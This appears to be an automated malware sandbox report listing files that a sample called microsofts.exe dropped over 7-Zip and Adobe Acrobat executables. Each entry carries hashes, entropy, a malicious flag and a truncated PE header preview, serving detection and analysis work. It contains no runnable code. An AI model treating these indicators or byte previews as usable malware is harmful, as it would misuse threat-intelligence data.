                                                                                                                                                                                                                                                                                                          C:\Program Files\7-Zip\7zFM.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1532416
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.09664585512176
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:6BpDRmi78gkPXlyo0GtjrSsqjnhMgeiCl7G0nehbGZpbD:eNRmi78gkPX4o0GtjSDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:8CF94AAB17B2A2FA8CF140DC5E5DB5B3
                                                                                                                                                                                                                                                                                                          SHA1:7CA081F8B34536A48517296F1379D136D9922846
                                                                                                                                                                                                                                                                                                          SHA-256:C7C7EACCA5AEB6D09A286CBD3B7F840EBE57A04B41BD07185E145EE72BF4062E
                                                                                                                                                                                                                                                                                                          SHA-512:1F4552BFC2EB0925D1DF5809B02BFB0EDC1544B4B1420F3CD40A5B21434E68856DC03C4917AF3EF0FFFB255689D5FB9C6157C370DCCCF6358A263048241E223F
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@.....................................o..... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\7-Zip\7zG.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1282048
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.229045441722522
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:7LOS2oTPIXVZsqjnhMgeiCl7G0nehbGZpbD:l/TKDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:4A55B6E3A0DD0166419D4D5AB5EFA282
                                                                                                                                                                                                                                                                                                          SHA1:E3A97C40855782036437FE0C887DC7930D434BEA
                                                                                                                                                                                                                                                                                                          SHA-256:776F62B0F6899F7AE38323F51D6715DBCF420641F7B1F4D74B93E825D1B13E27
                                                                                                                                                                                                                                                                                                          SHA-512:56E74467D1036B6B73E2208DEE3AC4290646990070CB24882020FFF43312432734A3A6ED41187BA770CA110F75C95A11C37731EEC82156DEBE413502F863DB8B
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@.....................................mk.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1145344
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.031182893421668
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:J17Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:J17sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:39F4BEF96F519F215E62526053C5DBE6
                                                                                                                                                                                                                                                                                                          SHA1:D12B7AB8FE84BFCB4C54295834A7797657B5800D
                                                                                                                                                                                                                                                                                                          SHA-256:82FA068DE4A93E6F9013BF175BC98208B0F03508FA3684FE14BE83D78E65CD41
                                                                                                                                                                                                                                                                                                          SHA-512:0DAD5C5B9809FD414AE28215564FE5EC85CCFD84FB3CC52A28DE9A84EA4D8A4AE1A8860D60AC326F9F2C2D74AA4708925CF24015E1908552FE6722E0A68C8C87
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1222656
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.712012542569059
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:VRudzcXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:VAdzcsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:DEDDA34A17DDB513BA60E9A5E58E8DCF
                                                                                                                                                                                                                                                                                                          SHA1:A3FE24606A6D216B4E53BA1457661FEFD9C042CD
                                                                                                                                                                                                                                                                                                          SHA-256:94CB20B19C95A711907BD90FAF0B4F61AB3B1DD584A1EA4BCB6EAA0E97A00CAB
                                                                                                                                                                                                                                                                                                          SHA-512:8170114DCC14CD5FD07BC2FBB543F141DECF07E7141933902A2D81BC268A833174A8A92B9EA7582AB9A312DFDC44E0505B5D5D349355D60E6541CA21BF6CDD5C
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@....................................8..... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1457664
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0821485374162405
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:lvgXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:qsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:9C3EF058A365CE9926EE22ED381AF322
                                                                                                                                                                                                                                                                                                          SHA1:128DE86279A01FB23909807BECD1D87DBC98C222
                                                                                                                                                                                                                                                                                                          SHA-256:547C99E68402AA3B41AF41FFFD93A31F84EB8334C9BC82940EA71B5B400E927C
                                                                                                                                                                                                                                                                                                          SHA-512:BB2BBA1DB35DCFAAD178EC7031816DBB7960CAB2F83E243E1707606727000CF4D804FA95F7BB8E619DCB27E5B8E1917E69A00055F57F1D5FE8F673B72A51F9AA
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@.......................................... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1461248
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.468593725891598
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:Y5zhM1XSElsqjnhMgeiCl7G0nehbGZpbD:mMsIDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:5B5E6C3BC110B7387F4B3B52B4BB6BDC
                                                                                                                                                                                                                                                                                                          SHA1:291E6BA40542182F6369783FC252EEB2AD3EDCF1
                                                                                                                                                                                                                                                                                                          SHA-256:CE11D27A541C37EECF465AFF17C6EB220365B03EAB5DDB07139AD182E8B98D6C
                                                                                                                                                                                                                                                                                                          SHA-512:B592E335C854AF7118D19583051A56C26BE9FB5E99D108422EEBB6E9524CC4D7F123023D084D10818C6AD2F007E5A510EB99F3620F1AFEE2BFED3AF6CAD39A95
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@....................................j..... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):4151808
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.499772328236918
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:JtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755eDmg27RN:JjEIa4HIEWOc5ED527BWG
                                                                                                                                                                                                                                                                                                          MD5:545280FAA06EC53D8449B5BCB9C7C430
                                                                                                                                                                                                                                                                                                          SHA1:79A3BDBCDC596527F7A12F8029181A03D8ABDEBE
                                                                                                                                                                                                                                                                                                          SHA-256:A2BCFE7AA3CD37CFAA98BC21854A1D2B21D05F92DA48E5168710301F8E668EF8
                                                                                                                                                                                                                                                                                                          SHA-512:21A7F2AFFF5B8D5F4F6EA84C740149B937F3659CE8F89F6F86CC42E0006E73450316327B1916998AF0A324E58BAA5094D16C7895C650FCA4DA8E79041327E7CD
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @....."3@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):59941376
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999367294634748
                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                          SSDEEP:1572864:xQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:iXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                          MD5:9B6FD190F8986AB6F8D5CBE2AFD95498
                                                                                                                                                                                                                                                                                                          SHA1:1063687A3239172BD377D9335FC65A983CB9B79B
                                                                                                                                                                                                                                                                                                          SHA-256:F9AB22D94632551A580814C3E169D96D14A1FD8B6A4D9BE12B4F4C7FBC235271
                                                                                                                                                                                                                                                                                                          SHA-512:5478FF047BCC317DDEF9766B01D1BF96DA96AEF0FF6B2BBD204876237DE5CD546F07D0F67D77DC1152C12B8E9FD3622254901931EA257394B690211A39233D1D
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......<..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1180160
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.084791068707341
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:mWwXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:m1sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:C096A5FBF9703540E7BC10E3E278CD21
                                                                                                                                                                                                                                                                                                          SHA1:21FD802336D967062BD04EA410DA4A6007EC9740
                                                                                                                                                                                                                                                                                                          SHA-256:C8E5B55371C0F381BC1B0B26036D747A9CEBA0BD15C589A96D72C246E088F530
                                                                                                                                                                                                                                                                                                          SHA-512:AAB69B86B301DDC908147EC357383863D15EBFD3BF9AA92CCA75BAC6E003928C0B29461A5BD764B96B7505FD11B511CD5170FCB41291A24AFDFA4B3EF6E5F6B9
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@............ .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):6210048
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.386701431865539
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:jDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXs:MnN9KfxLk6GEQTX5UKzNDHD527BWG
                                                                                                                                                                                                                                                                                                          MD5:51976ED4A3DA997522F1BB3A5682BA30
                                                                                                                                                                                                                                                                                                          SHA1:01B66F5E5713F0DF3F7B8B1FAF049570D48BED18
                                                                                                                                                                                                                                                                                                          SHA-256:FA06333A9A9A0AA91CF731730A83426531DD661E68CB3D861C4C9F941BEF8638
                                                                                                                                                                                                                                                                                                          SHA-512:45025248936BD25A7AF7D38BBE4971DB4D6F12A6A1D58FDE6C4F1CBEB503A806BBFC846A46ECB3B6B0F04DEF5E8BEEBA2D0D646DD765E9F181890242FB30DEF4
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......._... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1157120
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.041470905994349
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:a9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:a9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:04F6C57E32D32F73F17B56D7711EC64B
                                                                                                                                                                                                                                                                                                          SHA1:7E76D96C6D98BD8062644CD18C8E6EC1BF5427E2
                                                                                                                                                                                                                                                                                                          SHA-256:E3BEA8AE75C755A8D40F18BC36921A77D2530E76AA81C0CD019C3F216B45DD8E
                                                                                                                                                                                                                                                                                                          SHA-512:609F93167EE5FFD79BFCA99E7BBECD67844C39C594203FF73CDD5C7A080B3EED31DEFC25F05C720414EE466B91909AC3724C962D824024812773DEA14E65338F
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@.......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):12039168
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.596674583007492
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:98304:db+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKuD527BWG:hnPgTHIwZoRBk9DdhSUEVIXgKuVQBWG
                                                                                                                                                                                                                                                                                                          MD5:FA782E77322F0DAC17C058D191A33070
                                                                                                                                                                                                                                                                                                          SHA1:B3C68E535385F7889CFEBAA5C77BD182B47B84A5
                                                                                                                                                                                                                                                                                                          SHA-256:CF2A4418E83BA6A7FFA8637CE383588755701AA0B6549B8D76FAC57CFE3E7CA8
                                                                                                                                                                                                                                                                                                          SHA-512:1FF95D53823E4EA31112DEAAF07EB18E00B58CC66C96D9B7E007BC632884E977B74DE8092D44D00D2CBC3EE47245BB461EB10A052FA304FE2CA1A4CF94258E42
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@....................................BF.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1322496
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.281802330367829
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:4g5FvCPusKsqjnhMgeiCl7G0nehbGZpbD:dftNDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:E3DD6994142C17EE4793655E734CA489
                                                                                                                                                                                                                                                                                                          SHA1:A4A6B99DA04C63E04398B437E8BD596EF8C6F929
                                                                                                                                                                                                                                                                                                          SHA-256:06EB648200B8B2E765285284E6A0C8CB524F24E21202555D12E10551C27A0692
                                                                                                                                                                                                                                                                                                          SHA-512:61DD6A2876FE51BF6EDD98E1FAE34DD13C7ED0A22DF897ABA814FF658BF627074FFD7CF08F033401FE3D8017DFFCDD3900BC38CEDFDB6AD08F991220EA3722D0
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p.......A.... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1339904
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.2088716072922665
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:pjKTIsAjFuvtIfmFthMaT5U8aChaeu0sqjnhMgeiCl7G0nehbGZpbD:pjIMmPh7TT791Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:B49E587387E3A84064ADDABEFA6D4972
                                                                                                                                                                                                                                                                                                          SHA1:917376F9B55AC7CF8AD9356E4A51E93D3DFA3B0B
                                                                                                                                                                                                                                                                                                          SHA-256:185C790B6AF15BC16532D9301C930D39E7DAB1B775B711006FE75BB7E1CBD855
                                                                                                                                                                                                                                                                                                          SHA-512:F945E127B6A4424AB14E9FD3814FA5968936825B530888F360D9D10216B88DB8DD853E78EF0C3D61C2BE2C42548E142FA1C4E6BE89F1EFC48E6DC5FEEA1F8F39
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$.....[].... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1515520
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.411742669213158
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:RGqVwCto1Gm5WgAsqjnhMgeiCl7G0nehbGZpbD:wZ1GmUXDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:5BAA3CD13531CC8BEF5FB3993822BD82
                                                                                                                                                                                                                                                                                                          SHA1:4C33F60002335F0F840D1E647693D89BC0842011
                                                                                                                                                                                                                                                                                                          SHA-256:38287BF82F304B564116C1D5D9F9F941AEB9720E270162900EB8C7542F9AF6D2
                                                                                                                                                                                                                                                                                                          SHA-512:6079F5E0293CF7368555B637F6500EE3061DDC4C94D636465D54BA3F074F942C52E7D3B829ACBF52A3901F2CBB11571660A3B7802FBB19061D8871494510A707
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
